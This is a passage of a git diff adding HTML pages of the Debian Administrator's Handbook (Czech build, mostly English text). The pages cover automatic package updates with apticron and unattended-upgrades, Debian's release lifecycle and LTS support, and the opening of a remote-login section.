+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-derivatives.html"><strong>Další</strong>A.13. And Many More</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.regular-upgrades.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.regular-upgrades.html
new file mode 100644
index 000000000..8c58b7249
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.regular-upgrades.html
@@ -0,0 +1,160 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.7. Keeping a System Up to Date</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.dist-upgrade.html"
+        title="6.6. Upgrading from One Stable Distribution to the Next" /><link
+        rel="next"
+        href="sect.automatic-upgrades.html"
+        title="6.8. Automatic Upgrades" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.regular-upgrades.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dist-upgrade.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automatic-upgrades.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.regular-upgrades"></a>6.7. Keeping a System Up to Date</h2></div></div></div><div
+          class="para">
+			The Debian distribution is dynamic and changes continually. Most of the changes are in the <span
+            class="distribution distribution">Testing</span> and <span
+            class="distribution distribution">Unstable</span> versions, but even <span
+            class="distribution distribution">Stable</span> is updated from time to time, mostly for security-related fixes. Whatever version of Debian a system runs, it is generally a good idea to keep it up to date, so that you can get the benefit of recent evolutions and bug fixes.
+		</div><div
+          class="para">
+			While it is of course possible to periodically run a tool to check for available updates and run the upgrades, such a repetitive task is tedious, especially when it needs to be performed on several machines. Fortunately, like many repetitive tasks, it can be partly automated, and a set of tools have already been developed to that effect.
+		</div><div
+          class="para">
+			The first of these tools is <code
+            class="command">apticron</code>, in the package of the same name. Its main effect is to run a script daily (via <code
+            class="command">cron</code>). The script updates the list of available packages, and, if some installed packages are not in the latest available version, it sends an email with a list of these packages along with the changes that have been made in the new versions. Obviously, this package mostly targets users of Debian <span
+            class="distribution distribution">Stable</span>, since the daily emails would be very long for the faster paced versions of Debian. When updates are available, <code
+            class="command">apticron</code> automatically downloads them. It does not install them — the administrator will still do it — but having the packages already downloaded and available locally (in APT's cache) makes the job faster.
+		</div><div
+          class="para">
+			Administrators in charge of several computers will no doubt appreciate being informed of pending upgrades, but the upgrades themselves are still as tedious as they used to be. Periodic upgrades can be enabled: it uses a <code
+            class="command">systemd</code> timer unit or <code
+            class="command">cron</code>. If <span
+            class="pkg pkg">systemd</span> is not installed the <code
+            class="filename">/etc/cron.daily/apt-compat</code> script (in the <span
+            class="pkg pkg">apt</span> package) comes in handy. This script is run daily (and non-interactively) by <code
+            class="command">cron</code>. To control the behavior, use APT configuration variables (which are therefore stored in a file <code
+            class="filename">/etc/apt/apt.conf.d/10periodic</code>). The main variables are:
+		</div><div
+          class="variablelist"><dl
+            class="variablelist"><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::Update-Package-Lists</code> </span></dt><dd><div
+                class="para">
+						This option allows you to specify the frequency (in days) at which the package lists are refreshed. <code
+                  class="command">apticron</code> users can do without this variable, since <code
+                  class="command">apticron</code> already does this task.
+					</div></dd><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::Download-Upgradeable-Packages</code> </span></dt><dd><div
+                class="para">
+						Again, this option indicates a frequency (in days), this time for the downloading of the actual packages. Again, <code
+                  class="command">apticron</code> users won't need it.
+					</div></dd><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::AutocleanInterval</code> </span></dt><dd><div
+                class="para">
+						This option covers a feature that <code
+                  class="command">apticron</code> doesn't have. It controls how often obsolete packages (those not referenced by any distribution anymore) are removed from the APT cache. This keeps the APT cache at a reasonable size and means that you don't need to worry about that task.
+					</div></dd><dt><span
+                class="term"> <code
+                  class="literal">APT::Periodic::Unattended-Upgrade</code> </span></dt><dd><a
+                id="id-1.9.16.6.4.2.1"
+                class="indexterm"></a><div
+                class="para">
+						When this option is enabled, the daily script will execute <code
+                  class="command">unattended-upgrade</code> (from the <span
+                  class="pkg pkg">unattended-upgrades</span> package) which — as its name suggest — can automatize the upgrade process for some packages (by default it only takes care of security updates, but this can be customized in <code
+                  class="filename">/etc/apt/apt.conf.d/50unattended-upgrades</code>). Note that this option can be set with the help of debconf by running <code
+                  class="command">dpkg-reconfigure -plow unattended-upgrades</code>.
+					</div></dd></dl></div><div
+          class="para">
+			Other options can allow you to control the cache cleaning behavior with more precision. They are not listed here, but they are described in the <code
+            class="filename">/usr/lib/apt/apt.systemd.daily</code> script.
+		</div><a
+          id="id-1.9.16.8"
+          class="indexterm"></a><div
+          class="para">
+			These tools work very well for servers, but desktop users generally prefer a more interactive system. The package <span
+            class="pkg pkg">gnome-packagekit</span> provides an icon in the notification area of desktop environments when updates are available; clicking on this icon then runs <code
+            class="command">gpk-update-viewer</code>, a simplified interface to perform updates. You can browse through available updates, read the short description of the relevant packages and the corresponding <code
+            class="filename">changelog</code> entries, and select whether to apply the update or not on a case-by-case basis.
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.9.16.10"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/gnome-packagekit.png"
+                alt="Upgrading with gpk-update-viewer" /></div></div><p
+            class="title"><strong>Obrázek 6.3. Upgrading with <code
+                class="command">gpk-update-viewer</code></strong></p></div><div
+          class="para">
+			This tool is no longer installed in the default GNOME desktop. The new philosophy is that security updates should be automatically installed, either in the background or, preferably, when you shutdown your computer so as to not confuse any running application.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dist-upgrade.html"><strong>Předcházející</strong>6.6. Upgrading from One Stable Distribution to th...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automatic-upgrades.html"><strong>Další</strong>6.8. Automatic Upgrades</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.release-lifecycle.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.release-lifecycle.html
new file mode 100644
index 000000000..17b9c5a2b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.release-lifecycle.html
@@ -0,0 +1,371 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.6. Lifecycle of a Release</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.role-of-distributions.html"
+        title="1.5. The Role of Distributions" /><link
+        rel="next"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.release-lifecycle.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.role-of-distributions.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="case-study.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.release-lifecycle"></a>1.6. Lifecycle of a Release</h2></div></div></div><a
+          id="id-1.4.9.2"
+          class="indexterm"></a><a
+          id="id-1.4.9.3"
+          class="indexterm"></a><a
+          id="id-1.4.9.4"
+          class="indexterm"></a><a
+          id="id-1.4.9.5"
+          class="indexterm"></a><a
+          id="id-1.4.9.6"
+          class="indexterm"></a><a
+          id="id-1.4.9.7"
+          class="indexterm"></a><a
+          id="id-1.4.9.8"
+          class="indexterm"></a><div
+          class="para">
+			The project will simultaneously have three to six different versions of each program, named <span
+            class="distribution distribution">Experimental</span>, <span
+            class="distribution distribution">Unstable</span>, <span
+            class="distribution distribution">Testing</span>, <span
+            class="distribution distribution">Stable</span>, <span
+            class="distribution distribution">Oldstable</span>, and even <span
+            class="distribution distribution">Oldoldstable</span>. Each one corresponds to a different phase in development. For a good understanding, let us take a look at a program's journey, from its initial packaging to inclusion in a stable version of Debian.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Release</strong></p></div></div></div><a
+            id="id-1.4.9.10.2"
+            class="indexterm"></a><div
+            class="para">
+			The term “release”, in the Debian project, indicates a particular version of a distribution (e.g., “unstable release” means “the unstable version”). It also indicates the public announcement of the launch of any new version (stable).
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.11"></a>1.6.1. The <span
+                    class="distribution distribution">Experimental</span> Status</h3></div></div></div><div
+            class="para">
+				First let us take a look at the particular case of the <span
+              class="distribution distribution">Experimental</span> distribution: this is a group of Debian packages corresponding to the software currently in development, and not necessarily completed, explaining its name. Not everything passes through this step; some developers add packages here in order to get feedback from more experienced (or braver) users.
+			</div><div
+            class="para">
+				Otherwise, this distribution frequently houses important modifications to base packages, whose integration into <span
+              class="distribution distribution">Unstable</span> with serious bugs would have critical repercussions. It is, thus, a completely isolated distribution, its packages never migrate to another version (except by direct, express intervention of the maintainer or the ftpmasters). It is also not self-contained: only a subset of the existing packages are present in <span
+              class="distribution distribution">Experimental</span>, and it generally does not include the base system. This distribution is therefore mostly useful in combination with another, self-contained, distribution such as <span
+              class="distribution distribution">Unstable</span>.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.12"></a>1.6.2. The <span
+                    class="distribution distribution">Unstable</span> Status</h3></div></div></div><div
+            class="para">
+				Let us turn back to the case of a typical package. The maintainer creates an initial package, which they compile for the <span
+              class="distribution distribution">Unstable</span> version and place on the <code
+              class="literal">ftp-master.debian.org</code> server. This first event involves inspection and validation from the ftpmasters. The software is then available in the <span
+              class="distribution distribution">Unstable</span> distribution, which is the “cutting edge” distribution chosen by users who are more concerned with having up to date packages than worried about serious bugs. They discover the program and then test it.
+			</div><div
+            class="para">
+				If they encounter bugs, they report them to the package's maintainer. The maintainer then regularly prepares corrected versions, which they upload to the server.
+			</div><div
+            class="para">
+				Every newly updated package is updated on all Debian mirrors around the world within six hours. The users then test the corrections and search for other problems resulting from the modifications. Several updates may then occur rapidly. During these times, autobuilder robots come into action. Most frequently, the maintainer has only one traditional PC and has compiled their package on the amd64 (or i386) architecture (or they opted for a source-only upload, thus without any precompiled package); the autobuilders take over and automatically compile versions for all the other architectures. Some compilations may fail; the maintainer will then receive a bug report indicating the problem, which is then to be corrected in the next versions. When the bug is discovered by a specialist for the architecture in question, the bug report may come with a patch ready to use.
+			</div><a
+            id="id-1.4.9.12.5"
+            class="indexterm"></a><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.4.9.12.6"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/autobuilder.png"
+                  alt="Compilation of a package by the autobuilders" /></div></div><p
+              class="title"><strong>Obrázek 1.2. Compilation of a package by the autobuilders</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> <code
+                        class="command">buildd</code>, the Debian package recompiler</strong></p></div></div></div><a
+              id="id-1.4.9.12.7.2"
+              class="indexterm"></a><a
+              id="id-1.4.9.12.7.3"
+              class="indexterm"></a><div
+              class="para">
+				<span
+                class="emphasis"><em>buildd</em></span> is the abbreviation of “build daemon”. This program automatically recompiles new versions of Debian packages on the architectures on which it is hosted (cross-compilation is avoided as much as possible).
+			</div><div
+              class="para">
+				Thus, to produce binaries for the <code
+                class="literal">arm64</code> architecture, the project has <code
+                class="literal">arm64</code> machines available. The <span
+                class="emphasis"><em>buildd</em></span> program runs on them continuously and creates binary packages for <code
+                class="literal">arm64</code> from source packages sent by Debian developers.
+			</div><div
+              class="para">
+				This software is used on all the computers serving as autobuilders for Debian. By extension, the term <span
+                class="emphasis"><em>buildd</em></span> frequently is used to refer to these machines, which are generally reserved solely for this purpose.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.13"></a>1.6.3. Migration to <span
+                    class="distribution distribution">Testing</span></h3></div></div></div><div
+            class="para">
+				A bit later, the package will have matured; compiled on all the architectures, it will not have undergone recent modifications. It is then a candidate for inclusion in the <span
+              class="distribution distribution">Testing</span> distribution — a group of <span
+              class="distribution distribution">Unstable</span> packages chosen according to some quantifiable criteria. Every day a program automatically selects the packages to include in <span
+              class="distribution distribution">Testing</span>, according to elements guaranteeing a certain level of quality:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="orderedlist"><ol><li
+                class="listitem"><div
+                  class="para">
+						lack of critical bugs, or, at least fewer than the version currently included in <span
+                    class="distribution distribution">Testing</span>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						at least 10 days spent in <span
+                    class="distribution distribution">Unstable</span>, which is sufficient time to find and report any serious problems;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						successful compilation on all officially supported architectures;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						dependencies that can be satisfied in <span
+                    class="distribution distribution">Testing</span>, or that can at least be moved there together with the package in question.
+					</div></li></ol></div><div
+            class="para">
+				This system is clearly not infallible; critical bugs are regularly found in packages included in <span
+              class="distribution distribution">Testing</span>. Still, it is generally effective, and <span
+              class="distribution distribution">Testing</span> poses far fewer problems than <span
+              class="distribution distribution">Unstable</span>, being for many, a good compromise between stability and novelty.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Limitations of <span
+                        class="distribution distribution">Testing</span></strong></p></div></div></div><div
+              class="para">
+				While very interesting in principle, <span
+                class="distribution distribution">Testing</span> does have some practical problems: the tangle of cross-dependencies between packages is such that a package can rarely move there completely on its own. With packages all depending upon each other, it is sometimes necessary to migrate a large number of packages simultaneously, which is impossible when some are uploading updates regularly. On the other hand, the script identifying the families of related packages works hard to create them (this would be an NP-complete problem, for which, fortunately, we know some good heuristics). This is why we can manually interact with and guide this script by suggesting groups of packages, or imposing the inclusion of certain packages in a group, even if this temporarily breaks some dependencies. This functionality is accessible to the Release Managers and their assistants.
+			</div><div
+              class="para">
+				Recall that an NP-complete problem is of an exponential algorithmic complexity according to the size of the data, here being the length of the code (the number of figures) and the elements involved. The only way to resolve it is frequently to examine all possible configurations, which could require enormous means. A heuristic is an approximate, but satisfying, solution.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>COMMUNITY</em></span> The Release Manager</strong></p></div></div></div><a
+              id="id-1.4.9.13.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.9.13.6.3"
+              class="indexterm"></a><div
+              class="para">
+				Release Manager is an important title, associated with heavy responsibilities. The bearer of this title must, in effect, manage the release of a new, stable version of Debian, and define the process for development of <span
+                class="distribution distribution">Testing</span> until it meets the quality criteria for <span
+                class="distribution distribution">Stable</span>. They also define a tentative schedule (not always followed).
+			</div><div
+              class="para">
+				We also have Stable Release Managers, often abbreviated SRM, who manage and select updates for the current stable version of Debian. They systematically include security patches and examine all other proposals for inclusion, on a case by case basis, sent by Debian developers eager to update their package in the stable version.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.14"></a>1.6.4. The Promotion from <span
+                    class="distribution distribution">Testing</span> to <span
+                    class="distribution distribution">Stable</span></h3></div></div></div><div
+            class="para">
+				Let us suppose that our package is now included in <span
+              class="distribution distribution">Testing</span>. As long as it has room for improvement, its maintainer must continue to improve it and restart the process from <span
+              class="distribution distribution">Unstable</span> (but its later inclusion in <span
+              class="distribution distribution">Testing</span> is generally faster: unless it changed significantly, all of its dependencies are already available). When it reaches perfection, the maintainer has completed their work. The next step is the inclusion in the <span
+              class="distribution distribution">Stable</span> distribution, which is, in reality, a simple copy of <span
+              class="distribution distribution">Testing</span> at a moment chosen by the Release Manager. Ideally this decision is made when the installer is ready, and when no program in <span
+              class="distribution distribution">Testing</span> has any known critical bugs.
+			</div><div
+            class="para">
+				Since this moment never truly arrives, in practice, Debian must compromise: remove packages whose maintainer has failed to correct bugs on time, or agree to release a distribution with some bugs in the thousands of programs. The Release Manager will have previously announced a freeze period, during which each update to <span
+              class="distribution distribution">Testing</span> must be approved. The goal here is to prevent any new version (and its new bugs), and to only approve updates fixing bugs.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.4.9.14.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/release-cycle.png"
+                  alt="A package's path through the various Debian versions" /></div></div><p
+              class="title"><strong>Obrázek 1.3. A package's path through the various Debian versions</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Freeze: the home straight</strong></p></div></div></div><a
+              id="id-1.4.9.14.5.2"
+              class="indexterm"></a><div
+              class="para">
+				During the freeze period, development of the <span
+                class="distribution distribution">Testing</span> distribution is blocked; no more automatic updates are allowed. Only the Release Managers are then authorized to change packages, according to their own criteria. The purpose is to prevent the appearance of new bugs by introducing new versions; only thoroughly examined updates are authorized when they correct significant bugs.
+			</div></div><div
+            class="para">
+				After the release of a new stable version, the Stable Release Managers manage all further development (called “revisions”, ex: 7.1, 7.2, 7.3 for version 7). These updates systematically include all security patches. They will also include the most important corrections (the maintainer of a package must prove the gravity of the problem that they wish to correct in order to have their updates included).
+			</div><div
+            class="para">
+				At the end of the journey, our hypothetical package is now included in the stable distribution. This journey, not without its difficulties, explains the significant delays separating the Debian Stable releases. This contributes, over all, to its reputation for quality. Furthermore, the majority of users are satisfied using one of the three distributions simultaneously available. The system administrators, concerned above all about the stability of their servers, don't need the latest and greatest version of GNOME; they can choose Debian <span
+              class="distribution distribution">Stable</span>, and they will be satisfied. End users, more interested in the latest versions of GNOME or KDE Plasma than in rock-solid stability, will find Debian <span
+              class="distribution distribution">Testing</span> to be a good compromise between a lack of serious problems and relatively up to date software. Finally, developers and more experienced users may blaze the trail, testing all the latest developments in Debian <span
+              class="distribution distribution">Unstable</span> right out of the gate, at the risk of suffering the headaches and bugs inherent in any new version of a program. To each their own Debian!
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> GNOME and KDE Plasma, graphical desktop environments</strong></p></div></div></div><div
+              class="para">
+				GNOME (GNU Network Object Model Environment) and Plasma by KDE are the two most popular graphical desktop environments in the free software world. A desktop environment is a set of programs grouped together to allow easy management of the most common operations through a graphical interface. They generally include a file manager, office suite, web browser, e-mail program, multimedia accessories, etc. The most visible difference resides in the choice of the graphical library used: GNOME has chosen GTK+ (free software licensed under the LGPL), and the KDE community has selected Qt (a company-backed project, available nowadays both under the GPL and a commercial license). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.gnome.org/">https://www.gnome.org/</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.kde.org/">https://www.kde.org/</a></div>
+			</div></div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.4.9.14.9"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/package-lifecycle.png"
+                  alt="Chronological path of a program packaged by Debian" /></div></div><p
+              class="title"><strong>Obrázek 1.4. Chronological path of a program packaged by Debian</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.9.15"></a>1.6.5. The <span
+                    class="distribution distribution">Oldstable</span> and <span
+                    class="distribution distribution">Oldoldstable</span> Status</h3></div></div></div><a
+            id="id-1.4.9.15.2"
+            class="indexterm"></a><a
+            id="id-1.4.9.15.3"
+            class="indexterm"></a><div
+            class="para">
+				Each <span
+              class="distribution distribution">Stable</span> release has an expected lifetime of about 5 years and given that releases tend to happen every 2 years, there can be up to 3 supported releases at a given point of time. When a new stable release happens, the former release becomes <span
+              class="distribution distribution">Oldstable</span> and the one even before becomes <span
+              class="distribution distribution">Oldoldstable</span>.
+			</div><div
+            class="para">
+				This Long Term Support (LTS) of Debian releases is a recent initiative: individual contributors and companies joined forces to create the Debian LTS team. Older releases which are no longer supported by the Debian security team fall under the responsibility of this new team.
+			</div><div
+            class="para">
+				The Debian security team handles security support in the current <span
+              class="distribution distribution">Stable</span> release and also in the <span
+              class="distribution distribution">Oldstable</span> release (but only for as long as is needed to ensure one year of overlap with the current stable release). This amounts roughly to three years of support for each release. The Debian LTS team handles the last (two) years of security support so that each releases benefits from at least 5 years of support and so that users can upgrade from version N to N+2. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/LTS">https://wiki.debian.org/LTS</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>COMMUNITY</em></span> Companies sponsoring the LTS effort</strong></p></div></div></div><div
+              class="para">
+				Long Term Support is a difficult commitment to make in Debian because volunteers tend to avoid the work that is not very fun. And providing security support for 5 years old software is — for many contributors — a lot less fun than packaging new upstream versions or developing new features.
+			</div><div
+              class="para">
+				To bring this project to life, the project counted on the fact that long term support was particularly relevant for companies and that they would be willing to mutualize the cost of this security support.
+			</div><div
+              class="para">
+				The project started in June 2014: some organizations allowed their employees to contribute part-time to Debian LTS while others preferred to sponsor the project with money so that Debian contributors get paid to do the work that they would not do for free. Most Debian contributors willing to be paid to work on LTS got together to create a clear sponsorship offer managed by Freexian (Raphaël Hertzog's company): <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.freexian.com/services/debian-lts.html">https://www.freexian.com/services/debian-lts.html</a></div>
+			</div><div
+              class="para">
+				In the Debian LTS team, the volunteers work on packages they care about while the paid contributors prioritize packages used by their sponsors.
+			</div><div
+              class="para">
+				The project is always looking for new sponsors: What about your company? Can you let an employee work part-time on long term support? Can you allocate a small budget for security support? <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/LTS/Funding">https://wiki.debian.org/LTS/Funding</a></div>
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.role-of-distributions.html"><strong>Předcházející</strong>1.5. The Role of Distributions</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="case-study.html"><strong>Další</strong>Kapitola 2. Presenting the Case Study</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.remote-login.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.remote-login.html
new file mode 100644
index 000000000..c8ed9ca2e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.remote-login.html
@@ -0,0 +1,444 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.2. Remote Login</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="next"
+        href="sect.rights-management.html"
+        title="9.3. Managing Rights" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.remote-login.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="unix-services.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rights-management.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.remote-login"></a>9.2. Remote Login</h2></div></div></div><div
+          class="para">
+			It is essential for an administrator to be able to connect to a computer remotely. Servers, confined in their own room, are rarely equipped with permanent keyboards and monitors — but they are connected to the network.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Client, server</strong></p></div></div></div><a
+            id="id-1.12.5.3.2"
+            class="indexterm"></a><a
+            id="id-1.12.5.3.3"
+            class="indexterm"></a><div
+            class="para">
+			A system where several processes communicate with each other is often described with the “client/server” metaphor. The server is the program that takes requests coming from a client and executes them. It is the client that controls operations, the server doesn't take any initiative of its own.
+		</div></div><a
+          id="id-1.12.5.4"
+          class="indexterm"></a><a
+          id="id-1.12.5.5"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
